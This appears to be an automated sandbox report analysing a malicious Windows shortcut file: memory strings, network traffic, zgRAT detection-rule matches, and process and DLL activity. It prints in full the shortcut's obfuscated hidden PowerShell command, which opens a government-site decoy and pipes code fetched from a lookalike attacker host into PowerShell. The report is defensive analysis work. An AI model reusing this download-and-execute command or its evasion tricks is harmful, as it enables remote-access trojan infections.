                Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://file.io/
                Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 00000008.00000003.1531647828.000001B078210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonPhttp://www.google.com/maps/place/
                Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ministryofficedownloadcloudserver.screenpo
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.000001984294A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz//78/
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                Source: powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198440FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, jKSjtQ8W7O.lnkString found in binary or memory: https://pmo.gov.pk/site/404;
                Source: powershell.exe, 00000000.00000002.3947739594.0000028D94C90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D93078000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D9312D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D930C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404;$did=
                Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404v
                Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404y
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 203.101.184.118:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.8:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49732 version: TLS 1.2

                System Summary

                barindex
                Source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: jKSjtQ8W7O.lnkLNK file: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADD6E0010_2_00007FFB4ADD6E00
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADDC93B10_2_00007FFB4ADDC93B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADDCA9010_2_00007FFB4ADDCA90
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADDCA3510_2_00007FFB4ADDCA35
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADEDD8010_2_00007FFB4ADEDD80
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADFC51010_2_00007FFB4ADFC510
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFB4ADDEDE010_2_00007FFB4ADDEDE0
                Source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.evad.winLNK@26/23@17/9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqd1a1j.3am.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: jKSjtQ8W7O.lnkReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\nslookup.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
